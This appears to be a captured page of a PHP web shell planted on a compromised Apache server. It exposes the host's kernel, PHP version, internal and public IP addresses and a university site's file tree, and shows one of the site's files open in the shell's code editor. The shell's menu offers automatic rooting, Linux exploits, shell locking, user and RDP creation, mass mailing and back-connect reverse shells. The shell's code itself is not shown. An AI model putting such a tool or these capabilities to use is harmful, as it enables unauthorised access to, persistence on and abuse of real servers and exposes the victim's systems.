Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.218.50.170
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
student /
suk /
links /
[ HOME SHELL ]
Name
Size
Permission
Action
distnote.pdf
2.67
MB
-rwxr-xr-x
footer.php
720
B
-rwxr-xr-x
guidelines - blde.html
1.61
KB
-rwxr-xr-x
guidelines - sikkim.html
1.6
KB
-rwxr-xr-x
guidelines.html
1.76
KB
-rwxr-xr-x
guidelines_KUS.html
2.42
KB
-rwxr-xr-x
guidelines_rcub.html
2.29
KB
-rwxr-xr-x
header.php
1.04
KB
-rwxr-xr-x
js_files.php
1.68
KB
-rwxr-xr-x
uetnote.pdf
799.9
KB
-rwxr-xr-x
ugnew.pdf
2.98
MB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.php
<?php @session_start(); error_reporting(E_ALL ^ E_NOTICE); require_once(dirname(dirname(__FILE__))."/cconfig.php"); $aobj_context=CConfig::CreateNewDbContext(); $get_data="select FUNIVNAME,FUNIVADD1,pdf_logo_path,FUNIVCODE from control"; $obj_get_data=$aobj_context->mobj_db->GetRow($get_data); $FUNIVNAME = $obj_get_data['FUNIVNAME']; $FUNIVADD1 = $obj_get_data['FUNIVADD1']; $FUNIVCODE = $obj_get_data['FUNIVCODE']; $_SESSION['FUNIVCODE']=$FUNIVCODE; $pdf_logo_path=$obj_get_data['pdf_logo_path']; ?> <div class='header_left_div' onclick='home();'> <div class='header_log_left_div'><img height=110 width=125 src="<?php echo $pdf_logo_path?>"></div> </div> <div class='header_right_div'> <div class='header_right_txt_div'> <?php if($FUNIVCODE != '50')echo $FUNIVNAME?><br> <span id='span_address'><?php echo $FUNIVADD1?><br></span> </div><div onclick="home();" style="color: blue; cursor: pointer; float: right; font-size: 13px; position: relative; right: -35px;;">Home</div> </div> <div style='clear:both;'>
Close